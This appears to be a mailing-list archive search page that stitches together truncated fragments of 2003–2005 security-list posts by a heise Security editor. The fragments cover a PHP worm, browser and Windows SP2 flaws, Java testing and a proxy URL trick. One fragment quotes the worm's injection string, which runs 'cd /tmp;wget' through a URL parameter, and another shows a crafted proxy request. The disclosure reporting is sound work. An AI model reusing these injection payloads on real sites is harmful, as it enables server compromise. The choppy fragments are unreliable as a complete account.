On Sat, 25 Dec 2004, Pekka Savola wrote:
On Sat, 25 Dec 2004, Juergen Schmidt wrote:
It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:
'http://www.visualcoders.net/spy.gif?cmd=cd /tmp;wget
not getting a response, published the information he gathered.
What should he (or your mother) do, if mozilla is crashing on a
particular web site? Shut up? Learn how to write a buffer overflow
exploit before reporting it?
bye, ju
--
Juergen Schmidt Chefredakteur heise Security
) under Linux -- but this
may have been configured by me a long time ago.
On Windows, I can have the default opener set to my browser by adding:
Content-Disposition: attachment; filename=cttest.html
(the .html is important).
bye, ju
--
Juergen Schmidt Chefredakteur heise Security
this with Debian (unstable, j2re1.4) which uses a Java 1.4.1
from Blackdown.
It does not work.
Does this mean Blackdowns Java is not vulnerable? Or is testing for
sun.text.Utility not adequate for this.
The class sun.text.Utility is present in rt.jar.
bye, ju
--
Juergen Schmidt Chefredakteur heise
Date: 16.11.2005
Author: Juergen Schmidt, heise Security
Original article: http://www.heise.de/security/artikel/53297
German version: http://www.heise.de/security/news/meldung/53306
Flaws in SP2 security features, part II
With Service Pack 2 Microsoft introduced a couple of new security
features
= `malwarez'
1 HTTP/1.0 200 OK
...
8 Content-Type: text/html
So IE just uses the Content-Type to name this file.
bye, ju
--
Juergen SchmidtChefredakteur heise Security www.heisec.de
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
Tel. +49 511
. If the
downloaded archive evil.zip contains evil1.exe (attrib
-R) and evil2.exe (attrib +R) and you extract them with
the Wizard into the folder evil, opening evil1 gives
you a warning, opening evil2 not.
bye, ju
--
Juergen SchmidtChefredakteur heise Security www.heisec.de
Heise Zeitschriften Verlag
personal thoughts about this response in
the latest comment on heise Security: Microsoft: A
matter of trust,
http://www.heise.de/security/artikel/50054
--
Juergen SchmidtChefredakteur heise Security www.heisec.de
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
Tel. +49 511 5352
not evaluate the
redirection but passes the whole URL to the proxy:
GET http://www.heise.de%2F%20%20redir=.e-gold.com/ HTTP/1.0
bye, ju
--
Juergen SchmidtChefredakteur heise Security www.heisec.de
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover
Tel. +49 511 5352 300 FAX
come to a different conclusion,
once thing is certain: The IT systems of the energy utility companies are
vulnerable.
http://www.heise.de/ct/english/03/18/034/
bye, ju
--
Juergen Schmidt Leitender Redakteur/senior editor c't magazin
Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625
10 matches
Mail list logo